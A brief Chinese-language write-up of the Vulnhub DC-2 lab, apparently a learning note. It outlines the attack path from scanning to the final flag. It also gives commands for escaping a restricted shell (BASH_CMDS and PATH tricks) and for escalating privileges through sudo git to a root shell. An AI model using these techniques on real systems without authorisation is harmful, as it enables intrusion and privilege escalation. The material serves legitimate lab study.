Vulnhub——DC-2渗透

一、涉及漏洞类型

CMS漏洞

暴力破解

绕过受限shell

git提权

二、渗透思路

主机发现 => 端口扫描 => 访问web服务 => 拿到flag1 => 暴破登录 => 拿到flag2 => ssh登录 => 拿到flag3 => 绕过受限shell => 拿到flag4 => git提权 => 拿到最终flag

三、学到知识点

1.

compgen -c

查看当前可使用的命令

2.绕过Restricted Shell

BASH_CMDS[a]=/bin/sh ； a  #调用/bin/sh命令解释器
/bin/bash   #使用bash命令解释器
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin  #设置环境变量

3.git提权

方法一：
sudo git help config
!/bin/sh

 四、参考

 https://www.cnblogs.com/chenk0/articles/15527053.html

 https://blog.csdn.net/weixin_45605352/article/details/119416935